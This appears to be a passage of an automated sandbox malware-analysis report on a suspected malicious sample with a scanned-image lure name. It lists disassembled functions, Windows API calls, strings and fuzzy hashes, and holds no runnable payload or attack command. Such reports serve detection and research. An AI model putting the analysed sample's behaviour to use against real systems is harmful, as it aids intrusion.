                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                        • String ID:
                                                        • API String ID: 3215588206-0
                                                        • Opcode ID: 2f1e1375845de321b312a06b65f8f1d6a675b2d1ebff42b8a70c9e5906f52f3e
                                                        • Instruction ID: 66c857b9e32a8accb52633ebc32423d74fe8d7b84a20de507a1e8412af81e480
                                                        • Opcode Fuzzy Hash: 2f1e1375845de321b312a06b65f8f1d6a675b2d1ebff42b8a70c9e5906f52f3e
                                                        • Instruction Fuzzy Hash: 82415370E443196ADF509FBA8C4A96FFFF8EF91B50B10452FA509E7290DAB894018F61
                                                        Function 00A7AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A7AAA5
                                                        • __swprintf.LIBCMT ref: 00A7AB46
                                                        • _wcscmp.LIBCMT ref: 00A7AB59
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A7ABAE
                                                        • _wcscmp.LIBCMT ref: 00A7ABEA
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00A7AC21
                                                        • GetDlgCtrlID.USER32(?), ref: 00A7AC73
                                                        • GetWindowRect.USER32(?,?), ref: 00A7ACA9
                                                        • GetParent.USER32(?), ref: 00A7ACC7
                                                        • ScreenToClient.USER32(00000000), ref: 00A7ACCE
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A7AD48
                                                        • _wcscmp.LIBCMT ref: 00A7AD5C
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00A7AD82
                                                        • _wcscmp.LIBCMT ref: 00A7AD96
                                                          • Part of subcall function 00A4386C: _iswctype.LIBCMT ref: 00A43874
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: 448b0dd07053f296b175c7819e3ec78e75f395fd585cbfe4cca39c7409ee63af
                                                        • Instruction ID: cd5491f5ebd1bc4f646b12280e4640ddfdebf3ed084c49eab64ea1f59372a7df
                                                        • Opcode Fuzzy Hash: 448b0dd07053f296b175c7819e3ec78e75f395fd585cbfe4cca39c7409ee63af
                                                        • Instruction Fuzzy Hash: 66A1CE32204206BFDB29DF64CC84BAEB7A8FF94355F00C629F99D92191D730E945CB92
                                                        Function 00A7B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00A7B3DB
                                                        • _wcscmp.LIBCMT ref: 00A7B3EC
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00A7B414
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00A7B431
                                                        • _wcscmp.LIBCMT ref: 00A7B44F
                                                        • _wcsstr.LIBCMT ref: 00A7B460
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00A7B498
                                                        • _wcscmp.LIBCMT ref: 00A7B4A8
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00A7B4CF
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00A7B518
                                                        • _wcscmp.LIBCMT ref: 00A7B528
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00A7B550
                                                        • GetWindowRect.USER32(00000004,?), ref: 00A7B5B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 077bb453e5df36cfbddbec7087cb1ad798c3907e0d7857ca1fd22add7ce9e6ef
                                                        • Instruction ID: 4d3182df6ac4096f122a85df14eff0657df8d45364c777a77464d2d76f93fc8e
                                                        • Opcode Fuzzy Hash: 077bb453e5df36cfbddbec7087cb1ad798c3907e0d7857ca1fd22add7ce9e6ef
                                                        • Instruction Fuzzy Hash: B1819EB11182069FDB04DF54CD85FAA7BE8EF44314F04C569FD899A092DB34DE49CB61
                                                        Function 00AAA428 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00AAA4C8
                                                        • DestroyWindow.USER32(?,?), ref: 00AAA542
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AAA5BC
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AAA5DE
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AAA5F1
                                                        • DestroyWindow.USER32(00000000), ref: 00AAA613
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A20000,00000000), ref: 00AAA64A
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AAA663
                                                        • GetDesktopWindow.USER32 ref: 00AAA67C
                                                        • GetWindowRect.USER32(00000000), ref: 00AAA683
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AAA69B
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AAA6B3
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$@U=u$tooltips_class32
                                                        • API String ID: 1297703922-1130792468
                                                        • Opcode ID: 9a95482b3b453aa1c4b7c2e74ca02b27b3fccd01cd5b94a1ab39a55fc78ec30b
                                                        • Instruction ID: 2726b31833096d75d5496af7235f93c5fe784b84191c9f87c1e4549c6484d0ef
                                                        • Opcode Fuzzy Hash: 9a95482b3b453aa1c4b7c2e74ca02b27b3fccd01cd5b94a1ab39a55fc78ec30b
                                                        • Instruction Fuzzy Hash: 0B71AC71140245AFD724CF68CC49F6A7BE6FBAA304F08492DF9858B2A1D771E902CF56
                                                        Function 00AAC8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 00AAC917
                                                          • Part of subcall function 00AAADF1: ClientToScreen.USER32(?,?), ref: 00AAAE1A
                                                          • Part of subcall function 00AAADF1: GetWindowRect.USER32(?,?), ref: 00AAAE90
                                                          • Part of subcall function 00AAADF1: PtInRect.USER32(?,?,00AAC304), ref: 00AAAEA0
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AAC980
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AAC98B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AAC9AE
                                                        • _wcscat.LIBCMT ref: 00AAC9DE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AAC9F5
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00AACA0E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00AACA25
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00AACA47
                                                        • DragFinish.SHELL32(?), ref: 00AACA4E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AACB41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                        • API String ID: 169749273-762882726
                                                        • Opcode ID: 248a457383f409a6fe6b50952f7c2824032af00c99b8877c17926a7edbc055e4
                                                        • Instruction ID: 9edba27795f6d22db6163c735f26d62d9f08a03b61ceee3dc57a6089c583b2a0
                                                        • Opcode Fuzzy Hash: 248a457383f409a6fe6b50952f7c2824032af00c99b8877c17926a7edbc055e4
                                                        • Instruction Fuzzy Hash: AF616A71108311AFC711DFA4D985D9FBBE8FF99750F00092EF591971A1DB309A09CBA2
                                                        Function 00A7B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: 9150e71f535d2f96c1731242dbdc3cff3e806dffc8fa7cbb243fe1a47a9403df
                                                        • Instruction ID: 6aed9ee7393164e5bd6375608a53a97cf2cba691b6c5887e46644aa86dfb2dc9
                                                        • Opcode Fuzzy Hash: 9150e71f535d2f96c1731242dbdc3cff3e806dffc8fa7cbb243fe1a47a9403df
                                                        • Instruction Fuzzy Hash: 0331E271A54215A6DF10FA64DE43FEE7778AF10750F20892AF406721E2EF21AF04C6A0
                                                        Function 00AA4619 Relevance: 24.8, APIs: 2, Strings: 12, Instructions: 251windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00AA46AB
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AA46F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-383632319
                                                        • Opcode ID: 6e1dc2b3f964e91f1df0e6f206693a0a2c29b735aeea026f6a129e4ef70a32b8
                                                        • Instruction ID: 351511cab5c3b308759188b374f1873b9f477a9ceab5a818464d49ef184fc13d
                                                        • Opcode Fuzzy Hash: 6e1dc2b3f964e91f1df0e6f206693a0a2c29b735aeea026f6a129e4ef70a32b8
                                                        • Instruction Fuzzy Hash: A091AC34604711DFCB14EF24DA51A6EB7A1AF89714F00886DF8965B3E2CB71ED4ACB81
                                                        Function 00AABAB8 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 197windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AABB6E
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00AA6D80,?), ref: 00AABBCA
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AABC03
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AABC46
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AABC7D
                                                        • FreeLibrary.KERNEL32(?), ref: 00AABC89
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AABC99
                                                        • DestroyIcon.USER32(?), ref: 00AABCA8
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AABCC5
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AABCD1
                                                          • Part of subcall function 00A4313D: __wcsicmp_l.LIBCMT ref: 00A431C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl$@U=u
                                                        • API String ID: 1212759294-1639919054
                                                        • Opcode ID: 9a9bb1928d789466488e1f9133f77b8ab63168da74c13e2764cc68086262f3c8
                                                        • Instruction ID: 64f812aff9dd21564512aa4b6f5e447ff41fdab3786ed54661883014eeb2b63d
                                                        • Opcode Fuzzy Hash: 9a9bb1928d789466488e1f9133f77b8ab63168da74c13e2764cc68086262f3c8
                                                        • Instruction Fuzzy Hash: 6561EF71510219BEEB24DFA4CD42FBA77A8EB09721F104219F815D71D2DB75AA90CBB0
                                                        Function 00A8A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • CharLowerBuffW.USER32(?,?), ref: 00A8A636
                                                        • GetDriveTypeW.KERNEL32 ref: 00A8A683
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A8A6CB
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A8A702
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A8A730
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: c4a9c37a9b914be63269ca68a8c082a6ab8acb44e6ad9b83cec4481e7a756509
                                                        • Instruction ID: 88ccf0482bf5b14b657d437f40988736374faa39e22f038246877e5f0abf9022
                                                        • Opcode Fuzzy Hash: c4a9c37a9b914be63269ca68a8c082a6ab8acb44e6ad9b83cec4481e7a756509
                                                        • Instruction Fuzzy Hash: 26517A711083159FC700EF24DA8186AB7F8FF98758F04496DF886972A1DB31EE0ACB52
                                                        Function 00A8A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A8A47A
                                                        • __swprintf.LIBCMT ref: 00A8A49C
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A8A4D9
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A8A4FE
                                                        • _memset.LIBCMT ref: 00A8A51D
                                                        • _wcsncpy.LIBCMT ref: 00A8A559
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A8A58E
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A8A599
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00A8A5A2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A8A5AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: dfcd28270fd91dacd18f8914ee3b8477640c6206d1e6dc8a3b3f5c09b9a6a456
                                                        • Instruction ID: 672c25134aef6312a56be35505f87650214d355a6f7efcb8b502304c5a9e5e49
                                                        • Opcode Fuzzy Hash: dfcd28270fd91dacd18f8914ee3b8477640c6206d1e6dc8a3b3f5c09b9a6a456
                                                        • Instruction Fuzzy Hash: AB3180B650010AABEB21DFA0DC49FEB77BCEF89701F1041B6FA08D6190E77496858B25
                                                        Function 00AAC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AAC4EC
                                                        • GetFocus.USER32 ref: 00AAC4FC
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00AAC507
                                                        • _memset.LIBCMT ref: 00AAC632
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AAC65D
                                                        • GetMenuItemCount.USER32(?), ref: 00AAC67D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00AAC690
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AAC6C4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AAC70C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AAC744
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00AAC779
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 6ad56884a89b6e537e827cdab79f9ddf4c5ef8f948b685e9427bb7ff4eb5fa2b
                                                        • Instruction ID: a46286af207d0a7b55e86e63dbc2ad228d3d70376319d926ef49085a989a95f1
                                                        • Opcode Fuzzy Hash: 6ad56884a89b6e537e827cdab79f9ddf4c5ef8f948b685e9427bb7ff4eb5fa2b
                                                        • Instruction Fuzzy Hash: 7E819F70508352AFE724CF64C984A6BBBE4FB8A364F00492EF995972D1D730D905CFA2
                                                        Function 00A783F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A7874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A78766
                                                          • Part of subcall function 00A7874A: GetLastError.KERNEL32(?,00A7822A,?,?,?), ref: 00A78770
                                                          • Part of subcall function 00A7874A: GetProcessHeap.KERNEL32(00000008,?,?,00A7822A,?,?,?), ref: 00A7877F
                                                          • Part of subcall function 00A7874A: HeapAlloc.KERNEL32(00000000,?,00A7822A,?,?,?), ref: 00A78786
                                                          • Part of subcall function 00A7874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A7879D
                                                          • Part of subcall function 00A787E7: GetProcessHeap.KERNEL32(00000008,00A78240,00000000,00000000,?,00A78240,?), ref: 00A787F3
                                                          • Part of subcall function 00A787E7: HeapAlloc.KERNEL32(00000000,?,00A78240,?), ref: 00A787FA
                                                          • Part of subcall function 00A787E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A78240,?), ref: 00A7880B
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A78458
                                                        • _memset.LIBCMT ref: 00A7846D
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A7848C
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A7849D
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00A784DA
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A784F6
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A78513
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A78522
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A78529
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A7854A
                                                        • CopySid.ADVAPI32(00000000), ref: 00A78551
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A78582
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A785A8
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A785BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 6517dba673d7d3ba53d1528558ed2a6edf495a9fc81ea92e5d8748dc474a8027
                                                        • Instruction ID: e0548311937cb090ca070cf6ff1c4b13c24ce9abc7175cfb116c736e6b001c14
